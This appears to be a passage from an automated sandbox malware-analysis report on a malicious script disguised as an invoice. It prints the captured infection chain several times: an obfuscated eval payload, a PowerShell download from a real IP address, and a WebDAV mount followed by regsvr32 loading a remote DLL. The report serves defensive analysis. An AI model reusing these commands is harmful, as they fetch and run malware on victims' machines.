    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9302.js.csv");ITextStream.WriteLine(" entry:2530 f:pmrjir");ITextStream.WriteLine(" exec:2 f:pmrjir");ITextStream.WriteLine(" entry:5 o: f:eval a0:%22xfbhrjly%3D%5B1031%2C3079%2C5127%2C4103%2C2055%2C3072%5D%3Bvar%20ltnwcvkmp%3Dthis%5Bpqpxricd%2Bpiisgmm%2Bzmvat%2Btyqtziv%2Bjopltxl%2Bebyttknlk%2Byxsly%2Bziijnicxr%5D(this%5Bgoyxe%2Bawcgmkw%2Bkhnvbl%2B");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.Run("cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.", "0", "false")
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeCOM call: HKEY_CURRENT_USER\Control Panel\International\LocaleJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5062Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4803Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824Thread sleep count: 5062 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824Thread sleep count: 4803 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -13835058055282155s >= -30000sJump to behavior
    Source: C:\Windows\System32\net.exe TID: 6468Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 2800Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: net.exe, 00000007.00000002.1619725052.000001D103A46000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.1615932604.000001D103A46000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619496596.000001D1039E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2800124691.000002C40B02B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2801576933.000002C410653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information22
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    22
    Scripting
    11
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Network Share Discovery
    Remote ServicesData from Local System1
    Data Obfuscation
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    131
    Virtualization/Sandbox Evasion
    LSASS Memory11
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell
    Login HookLogin Hook1
    Obfuscated Files or Information
    NTDS131
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    Application Window Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync122
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
